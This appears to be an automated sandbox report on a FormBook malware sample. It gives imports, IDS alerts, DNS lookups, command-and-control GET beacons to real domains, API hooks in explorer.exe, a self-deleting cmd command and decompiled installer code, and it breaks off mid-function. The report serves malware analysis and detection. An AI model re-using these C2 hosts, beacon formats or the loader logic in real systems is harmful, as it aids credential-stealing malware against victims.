                                                                                      USER32.dll    SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                                      GDI32.dll     SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                      KERNEL32.dll  GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                                                      Version Infos

                                                                                      Description      Data
                                                                                      LegalCopyright   Copyright shivering
                                                                                      FileVersion      65.93.64.23
                                                                                      CompanyName      daf
                                                                                      LegalTrademarks  mist
                                                                                      Comments         crookback
                                                                                      ProductName      pinewood king bolete
                                                                                      FileDescription  Abkhazian (Latin script)
                                                                                      Translation      0x0409 0x04e4

                                                                                      Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                                                                                      Network Behavior

                                                                                      Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/23/21-15:32:01.456680 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49746 | 80 | 192.168.2.6 | 34.102.136.180
02/23/21-15:32:01.456680 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49746 | 80 | 192.168.2.6 | 34.102.136.180
02/23/21-15:32:01.456680 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49746 | 80 | 192.168.2.6 | 34.102.136.180
02/23/21-15:32:01.600872 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49746 | 34.102.136.180 | 192.168.2.6
02/23/21-15:32:44.386288 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.6 | 111.221.46.49
02/23/21-15:32:44.386288 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.6 | 111.221.46.49
02/23/21-15:32:44.386288 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.6 | 111.221.46.49

                                                                                      TCP Packets


                                                                                      UDP Packets


                                                                                      DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 23, 2021 15:32:01.334067106 CET | 192.168.2.6 | 8.8.8.8 | 0xcf60 | Standard query (0) | www.thatlocaljawn.com | A (IP address) | IN (0x0001)
Feb 23, 2021 15:32:21.792572975 CET | 192.168.2.6 | 8.8.8.8 | 0xcc94 | Standard query (0) | www.warungsuntik.com | A (IP address) | IN (0x0001)
Feb 23, 2021 15:32:43.900327921 CET | 192.168.2.6 | 8.8.8.8 | 0x5f23 | Standard query (0) | www.tabandolano.online | A (IP address) | IN (0x0001)

                                                                                      DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 23, 2021 15:32:01.410595894 CET | 8.8.8.8 | 192.168.2.6 | 0xcf60 | No error (0) | www.thatlocaljawn.com | thatlocaljawn.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 15:32:01.410595894 CET | 8.8.8.8 | 192.168.2.6 | 0xcf60 | No error (0) | thatlocaljawn.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Feb 23, 2021 15:32:22.009269953 CET | 8.8.8.8 | 192.168.2.6 | 0xcc94 | No error (0) | www.warungsuntik.com | | 168.206.81.138 | A (IP address) | IN (0x0001)
Feb 23, 2021 15:32:44.192182064 CET | 8.8.8.8 | 192.168.2.6 | 0x5f23 | No error (0) | www.tabandolano.online | tabandolano.online | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 15:32:44.192182064 CET | 8.8.8.8 | 192.168.2.6 | 0x5f23 | No error (0) | tabandolano.online | | 111.221.46.49 | A (IP address) | IN (0x0001)

                                                                                      HTTP Request Dependency Graph

                                                                                      • www.thatlocaljawn.com
                                                                                      • www.warungsuntik.com
                                                                                      • www.tabandolano.online

                                                                                      HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49746 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 15:32:01.456680059 CET | 6332 | OUT | GET /rcv/?VRNh=cg6bZkxEcNPMAIRmM8GPonkuA9GKh0BFEGdQJ3UU0rDFwE5vgU0uCiOyxYirtUdr8QJdvBkiGw==&jL08l2=WXL00450GFoHk HTTP/1.1
Host: www.thatlocaljawn.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 15:32:01.600872040 CET | 6333 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Tue, 23 Feb 2021 14:32:01 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6031584e-113"
Via: 1.1 google
Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49752 | 168.206.81.138 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 15:32:22.405430079 CET | 6365 | OUT | GET /rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk HTTP/1.1
Host: www.warungsuntik.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 15:32:22.799669981 CET | 6368 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 23 Feb 2021 14:32:22 GMT
Content-Type: text/html
Content-Length: 479
Connection: close
ETag: "601d0d01-1df"
                                                                                      Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.6 | 49753 | 111.221.46.49 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 15:32:44.386287928 CET | 6388 | OUT | GET /rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk HTTP/1.1
Host: www.tabandolano.online
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 15:32:44.603816986 CET | 6388 | IN | HTTP/1.1 302 Found
Date: Tue, 23 Feb 2021 14:32:44 GMT
Server: Apache
Location: http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk
Content-Length: 346
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&amp;jL08l2=WXL00450GFoHk">here</a>.</p></body></html>


                                                                                      Code Manipulations

                                                                                      User Modules

                                                                                      Hook Summary

                                                                                      Function Name    Hook Type    Active in Processes
                                                                                      PeekMessageA     INLINE       explorer.exe
                                                                                      PeekMessageW     INLINE       explorer.exe
                                                                                      GetMessageW      INLINE       explorer.exe
                                                                                      GetMessageA      INLINE       explorer.exe

                                                                                      Processes

                                                                                      Process: explorer.exe, Module: user32.dll
                                                                                      Function Name    Hook Type    New Data
                                                                                      PeekMessageA     INLINE       0x48 0x8B 0xB8 0x8D 0xDE 0xEA
                                                                                      PeekMessageW     INLINE       0x48 0x8B 0xB8 0x85 0x5E 0xEA
                                                                                      GetMessageW      INLINE       0x48 0x8B 0xB8 0x85 0x5E 0xEA
                                                                                      GetMessageA      INLINE       0x48 0x8B 0xB8 0x8D 0xDE 0xEA

                                                                                      System Behavior

                                                                                      General

                                                                                      Start time: 15:30:48
                                                                                      Start date: 23/02/2021
                                                                                      Path: C:\Users\user\Desktop\cryptedprof.exe
                                                                                      Wow64 process (32bit): true
                                                                                      Commandline: 'C:\Users\user\Desktop\cryptedprof.exe'
                                                                                      Imagebase: 0x400000
                                                                                      File size: 339210 bytes
                                                                                      MD5 hash: 72EFE20E4A59AE2722383B8786956994
                                                                                      Has elevated privileges: true
                                                                                      Has administrator privileges: true
                                                                                      Programmed in: C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation: low

                                                                                      General

                                                                                      Start time: 15:30:48
                                                                                      Start date: 23/02/2021
                                                                                      Path: C:\Users\user\Desktop\cryptedprof.exe
                                                                                      Wow64 process (32bit): true
                                                                                      Commandline: 'C:\Users\user\Desktop\cryptedprof.exe'
                                                                                      Imagebase: 0x400000
                                                                                      File size: 339210 bytes
                                                                                      MD5 hash: 72EFE20E4A59AE2722383B8786956994
                                                                                      Has elevated privileges: true
                                                                                      Has administrator privileges: true
                                                                                      Programmed in: C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation: low

                                                                                      General

                                                                                      Start time: 15:30:54
                                                                                      Start date: 23/02/2021
                                                                                      Path: C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit): false
                                                                                      Commandline:
                                                                                      Imagebase: 0x7ff6f22f0000
                                                                                      File size: 3933184 bytes
                                                                                      MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                                                                      Has elevated privileges: true
                                                                                      Has administrator privileges: true
                                                                                      Programmed in: C, C++ or other language
                                                                                      Reputation: high

                                                                                      General

                                                                                      Start time: 15:31:15
                                                                                      Start date: 23/02/2021
                                                                                      Path: C:\Windows\SysWOW64\msdt.exe
                                                                                      Wow64 process (32bit): true
                                                                                      Commandline: C:\Windows\SysWOW64\msdt.exe
                                                                                      Imagebase: 0x180000
                                                                                      File size: 1508352 bytes
                                                                                      MD5 hash: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                      Has elevated privileges: true
                                                                                      Has administrator privileges: true
                                                                                      Programmed in: C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation: moderate

                                                                                      General

                                                                                      Start time: 15:31:19
                                                                                      Start date: 23/02/2021
                                                                                      Path: C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit): true
                                                                                      Commandline: /c del 'C:\Users\user\Desktop\cryptedprof.exe'
                                                                                      Imagebase: 0x2a0000
                                                                                      File size: 232960 bytes
                                                                                      MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges: true
                                                                                      Has administrator privileges: true
                                                                                      Programmed in: C, C++ or other language
                                                                                      Reputation: high

                                                                                      General

                                                                                      Start time: 15:31:19
                                                                                      Start date: 23/02/2021
                                                                                      Path: C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit): false
                                                                                      Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase: 0x7ff61de10000
                                                                                      File size: 625664 bytes
                                                                                      MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges: true
                                                                                      Has administrator privileges: true
                                                                                      Programmed in: C, C++ or other language
                                                                                      Reputation: high

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                        Executed Functions

                                                                                        C-Code - Quality: 86%
                                                                                        			_entry_() {
                                                                                        				signed int _t42;
                                                                                        				intOrPtr* _t47;
                                                                                        				CHAR* _t51;
                                                                                        				char* _t53;
                                                                                        				CHAR* _t55;
                                                                                        				void* _t59;
                                                                                        				intOrPtr _t61;
                                                                                        				int _t63;
                                                                                        				int _t66;
                                                                                        				signed int _t67;
                                                                                        				int _t68;
                                                                                        				signed int _t70;
                                                                                        				void* _t94;
                                                                                        				signed int _t110;
                                                                                        				void* _t113;
                                                                                        				void* _t118;
                                                                                        				intOrPtr* _t119;
                                                                                        				char _t122;
                                                                                        				signed int _t141;
                                                                                        				signed int _t142;
                                                                                        				int _t150;
                                                                                        				void* _t151;
                                                                                        				intOrPtr* _t153;
                                                                                        				CHAR* _t156;
                                                                                        				CHAR* _t157;
                                                                                        				void* _t159;
                                                                                        				char* _t160;
                                                                                        				void* _t163;
                                                                                        				void* _t164;
                                                                                        				char _t189;
                                                                                        
                                                                                        				 *(_t164 + 0x18) = 0;
                                                                                        				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                        				 *(_t164 + 0x20) = 0;
                                                                                        				 *(_t164 + 0x14) = 0x20;
                                                                                        				SetErrorMode(0x8001); // executed
                                                                                        				_t42 = GetVersion() & 0xbfffffff;
                                                                                        				 *0x42f44c = _t42;
                                                                                        				if(_t42 != 6) {
                                                                                        					_t119 = E00406656(0);
                                                                                        					if(_t119 != 0) {
                                                                                        						 *_t119(0xc00);
                                                                                        					}
                                                                                        				}
                                                                                        				_t156 = "UXTHEME";
                                                                                        				do {
                                                                                        					E004065E8(_t156); // executed
                                                                                        					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
                                                                                        				} while ( *_t156 != 0);
                                                                                        				E00406656(0xb);
                                                                                        				 *0x42f444 = E00406656(9);
                                                                                        				_t47 = E00406656(7);
                                                                                        				if(_t47 != 0) {
                                                                                        					_t47 =  *_t47(0x1e);
                                                                                        					if(_t47 != 0) {
                                                                                        						 *0x42f44f =  *0x42f44f | 0x00000040;
                                                                                        					}
                                                                                        				}
                                                                                        				__imp__#17(_t159);
                                                                                        				__imp__OleInitialize(0); // executed
                                                                                        				 *0x42f518 = _t47;
                                                                                        				SHGetFileInfoA(0x429878, 0, _t164 + 0x38, 0x160, 0); // executed
                                                                                        				E0040624D("Setup Setup", "NSIS Error");
                                                                                        				_t51 = GetCommandLineA();
                                                                                        				_t160 = "\"C:\\Users\\engineer\\Desktop\\cryptedprof.exe\" ";
                                                                                        				E0040624D(_t160, _t51);
                                                                                        				 *0x42f440 = 0x400000;
                                                                                        				_t53 = _t160;
                                                                                        				if("\"C:\\Users\\engineer\\Desktop\\cryptedprof.exe\" " == 0x22) {
                                                                                        					 *(_t164 + 0x14) = 0x22;
                                                                                        					_t53 =  &M00435001;
                                                                                        				}
                                                                                        				_t55 = CharNextA(E00405C10(_t53,  *(_t164 + 0x14)));
                                                                                        				 *(_t164 + 0x1c) = _t55;
                                                                                        				while(1) {
                                                                                        					_t122 =  *_t55;
                                                                                        					_t172 = _t122;
                                                                                        					if(_t122 == 0) {
                                                                                        						break;
                                                                                        					}
                                                                                        					__eflags = _t122 - 0x20;
                                                                                        					if(_t122 != 0x20) {
                                                                                        						L13:
                                                                                        						__eflags =  *_t55 - 0x22;
                                                                                        						 *(_t164 + 0x14) = 0x20;
                                                                                        						if( *_t55 == 0x22) {
                                                                                        							_t55 =  &(_t55[1]);
                                                                                        							__eflags = _t55;
                                                                                        							 *(_t164 + 0x14) = 0x22;
                                                                                        						}
                                                                                        						__eflags =  *_t55 - 0x2f;
                                                                                        						if( *_t55 != 0x2f) {
                                                                                        							L25:
                                                                                        							_t55 = E00405C10(_t55,  *(_t164 + 0x14));
                                                                                        							__eflags =  *_t55 - 0x22;
                                                                                        							if(__eflags == 0) {
                                                                                        								_t55 =  &(_t55[1]);
                                                                                        								__eflags = _t55;
                                                                                        							}
                                                                                        							continue;
                                                                                        						} else {
                                                                                        							_t55 =  &(_t55[1]);
                                                                                        							__eflags =  *_t55 - 0x53;
                                                                                        							if( *_t55 != 0x53) {
                                                                                        								L20:
                                                                                        								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
                                                                                        								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
                                                                                        									L24:
                                                                                        									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
                                                                                        									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
                                                                                        										 *((char*)(_t55 - 2)) = 0;
                                                                                        										__eflags =  &(_t55[2]);
                                                                                        										E0040624D("C:\\Users\\engineer\\AppData\\Local\\Temp",  &(_t55[2]));
                                                                                        										L30:
                                                                                        										_t157 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
                                                                                        										GetTempPathA(0x400, _t157);
                                                                                        										_t59 = E00403455(_t172);
                                                                                        										_t173 = _t59;
                                                                                        										if(_t59 != 0) {
                                                                                        											L33:
                                                                                        											DeleteFileA("1033"); // executed
                                                                                        											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
                                                                                        											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
                                                                                        											if(_t61 != 0) {
                                                                                        												L43:
                                                                                        												E0040396E();
                                                                                        												__imp__OleUninitialize();
                                                                                        												_t185 =  *((intOrPtr*)(_t164 + 0x10));
                                                                                        												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
                                                                                        													__eflags =  *0x42f4f4;
                                                                                        													if( *0x42f4f4 == 0) {
                                                                                        														L67:
                                                                                        														_t63 =  *0x42f50c;
                                                                                        														__eflags = _t63 - 0xffffffff;
                                                                                        														if(_t63 != 0xffffffff) {
                                                                                        															 *(_t164 + 0x14) = _t63;
                                                                                        														}
                                                                                        														ExitProcess( *(_t164 + 0x14));
                                                                                        													}
                                                                                        													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
                                                                                        													__eflags = _t66;
                                                                                        													_t150 = 2;
                                                                                        													if(_t66 != 0) {
                                                                                        														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
                                                                                        														 *(_t164 + 0x38) = 1;
                                                                                        														 *(_t164 + 0x44) = _t150;
                                                                                        														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
                                                                                        													}
                                                                                        													_t67 = E00406656(4);
                                                                                        													__eflags = _t67;
                                                                                        													if(_t67 == 0) {
                                                                                        														L65:
                                                                                        														_t68 = ExitWindowsEx(_t150, 0x80040002);
                                                                                        														__eflags = _t68;
                                                                                        														if(_t68 != 0) {
                                                                                        															goto L67;
                                                                                        														}
                                                                                        														goto L66;
                                                                                        													} else {
                                                                                        														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
                                                                                        														__eflags = _t70;
                                                                                        														if(_t70 == 0) {
                                                                                        															L66:
                                                                                        															E0040140B(9);
                                                                                        															goto L67;
                                                                                        														}
                                                                                        														goto L65;
                                                                                        													}
                                                                                        												}
                                                                                        												E00405969( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
                                                                                        												ExitProcess(2);
                                                                                        											}
                                                                                        											if( *0x42f460 == 0) {
                                                                                        												L42:
                                                                                        												 *0x42f50c =  *0x42f50c | 0xffffffff;
                                                                                        												 *(_t164 + 0x18) = E00403A60( *0x42f50c);
                                                                                        												goto L43;
                                                                                        											}
                                                                                        											_t153 = E00405C10(_t160, 0);
                                                                                        											if(_t153 < _t160) {
                                                                                        												L39:
                                                                                        												_t182 = _t153 - _t160;
                                                                                        												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
                                                                                        												if(_t153 < _t160) {
                                                                                        													_t151 = E004058D4(_t185);
                                                                                        													lstrcatA(_t157, "~nsu");
                                                                                        													if(_t151 != 0) {
                                                                                        														lstrcatA(_t157, "A");
                                                                                        													}
                                                                                        													lstrcatA(_t157, ".tmp");
                                                                                        													_t162 = "C:\\Users\\engineer\\Desktop";
                                                                                        													if(lstrcmpiA(_t157, "C:\\Users\\engineer\\Desktop") != 0) {
                                                                                        														_push(_t157);
                                                                                        														if(_t151 == 0) {
                                                                                        															E004058B7();
                                                                                        														} else {
                                                                                        															E0040583A();
                                                                                        														}
                                                                                        														SetCurrentDirectoryA(_t157);
                                                                                        														_t189 = "C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
                                                                                        														if(_t189 == 0) {
                                                                                        															E0040624D("C:\\Users\\engineer\\AppData\\Local\\Temp", _t162);
                                                                                        														}
                                                                                        														E0040624D(0x430000,  *(_t164 + 0x1c));
                                                                                        														_t137 = "A";
                                                                                        														_t163 = 0x1a;
                                                                                        														 *0x430400 = "A";
                                                                                        														do {
                                                                                        															E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x120)));
                                                                                        															DeleteFileA(0x429478);
                                                                                        															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\engineer\\Desktop\\cryptedprof.exe", 0x429478, 1) != 0) {
                                                                                        																E0040602C(_t137, 0x429478, 0);
                                                                                        																E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x124)));
                                                                                        																_t94 = E004058EC(0x429478);
                                                                                        																if(_t94 != 0) {
                                                                                        																	CloseHandle(_t94);
                                                                                        																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                                                        																}
                                                                                        															}
                                                                                        															 *0x430400 =  *0x430400 + 1;
                                                                                        															_t163 = _t163 - 1;
                                                                                        														} while (_t163 != 0);
                                                                                        														E0040602C(_t137, _t157, 0);
                                                                                        													}
                                                                                        													goto L43;
                                                                                        												}
                                                                                        												 *_t153 = 0;
                                                                                        												_t154 = _t153 + 4;
                                                                                        												if(E00405CD3(_t182, _t153 + 4) == 0) {
                                                                                        													goto L43;
                                                                                        												}
                                                                                        												E0040624D("C:\\Users\\engineer\\AppData\\Local\\Temp", _t154);
                                                                                        												E0040624D("C:\\Users\\engineer\\AppData\\Local\\Temp", _t154);
                                                                                        												 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                                                        												goto L42;
                                                                                        											}
                                                                                        											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
                                                                                        											while( *_t153 != _t110) {
                                                                                        												_t153 = _t153 - 1;
                                                                                        												if(_t153 >= _t160) {
                                                                                        													continue;
                                                                                        												}
                                                                                        												goto L39;
                                                                                        											}
                                                                                        											goto L39;
                                                                                        										}
                                                                                        										GetWindowsDirectoryA(_t157, 0x3fb);
                                                                                        										lstrcatA(_t157, "\\Temp");
                                                                                        										_t113 = E00403455(_t173);
                                                                                        										_t174 = _t113;
                                                                                        										if(_t113 != 0) {
                                                                                        											goto L33;
                                                                                        										}
                                                                                        										GetTempPathA(0x3fc, _t157);
                                                                                        										lstrcatA(_t157, "Low");
                                                                                        										SetEnvironmentVariableA("TEMP", _t157);
                                                                                        										SetEnvironmentVariableA("TMP", _t157);
                                                                                        										_t118 = E00403455(_t174);
                                                                                        										_t175 = _t118;
                                                                                        										if(_t118 == 0) {
                                                                                        											goto L43;
                                                                                        										}
                                                                                        										goto L33;
                                                                                        									}
                                                                                        									goto L25;
                                                                                        								}
                                                                                        								_t141 = _t55[4];
                                                                                        								__eflags = _t141 - 0x20;
                                                                                        								if(_t141 == 0x20) {
                                                                                        									L23:
                                                                                        									_t15 = _t164 + 0x20;
                                                                                        									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
                                                                                        									__eflags =  *_t15;
                                                                                        									goto L24;
                                                                                        								}
                                                                                        								__eflags = _t141;
                                                                                        								if(_t141 != 0) {
                                                                                        									goto L24;
